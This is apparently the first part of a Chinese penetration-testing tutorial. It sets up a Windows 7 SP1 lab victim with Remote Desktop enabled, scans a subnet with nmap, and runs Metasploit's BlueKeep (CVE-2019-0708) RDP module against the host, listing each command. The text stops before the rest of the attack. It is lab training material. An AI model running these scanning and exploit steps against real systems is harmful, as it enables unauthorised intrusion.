网络安全工程师与白帽子黑客教你：远程桌面漏洞利用与Windows7计算机攻防实战技巧【上】

一、课前声明：
1、本分享仅做学习交流，请自觉遵守法律法规！
2、搜索：Kali 与编程，学习更多网络攻防干货！
3、Kali 与编程每天准时更新，敬请学习和关注！

二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.Win7 SP1受害者主机一个；
3.整装待发的小白一个。

三、战略安排
3.1 搭建受害者主机环境，如下图所示。
3.1.1 受害者主机基本信息介绍，如下图所示。

3.1.2 受害者主机下载教程，如下图所示。
网站：MSDN
步骤：打开网站、选择操作系统、选择Windows7、选择企业版SP1、复制链接、进入迅雷下载镜像。

3.1.3 开启受害者主机的远程登录服务即开启“3389”端口，如下图所示。
步骤：点击Windows、选择计算机、选择系统属性、选择允许远程连接该计算机、选择允许连接任意版本的远程桌面计算机连接、点击应用、点击确定。

3.2 配置攻击者主机跟受害者主机的网络环境，如下图所示。
步骤：两台主机全部选择桥接模式上网即可。

3.3 查看攻击者主机的IP地址网段，如下图所示。
命令：ifconfig

3.4 利用“nmap”扫描工具对攻击者主机所在网段进行主机查询（信息收集），如下图所示。
命令：nmap -p 3389 192.168.0.1/24

3.5 nmap扫描结果如下图所示。

3.6 利用Metasploit工具对受害者主机进行漏洞攻击，如下图所示。
3.6.1 打开Metasploit渗透框架，如下图所示。
命令：msfconsole

3.6.2 利用Metasploit渗透框架对Windows远程登录相关漏洞进行检索，如下图所示。
命令：search 0708

3.6.3 利用检索到的相关漏洞模块，如下图所示。
命令：use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

3.6.4 查看该漏洞的相关参数配置，如下图所示。
命令：show options

3.6.5 设置相关参数，如下图所示。
命令：set RDP_CLIENT_IP 192.168.0.106
命令：set rhosts 192.168.0.106

3.7 运行漏洞模块对目标主机进行攻击，如下图所示。
命令：run

                           未完待续

辛苦原创，你的每一次评论点赞和关注，都是我们源源不断的创作动力哦！你也可搜索:Kali 与编程，学习更多 Kali Linux 渗透与白帽编程技巧呢！
点我学习完整视频渗透课，预计更新1000节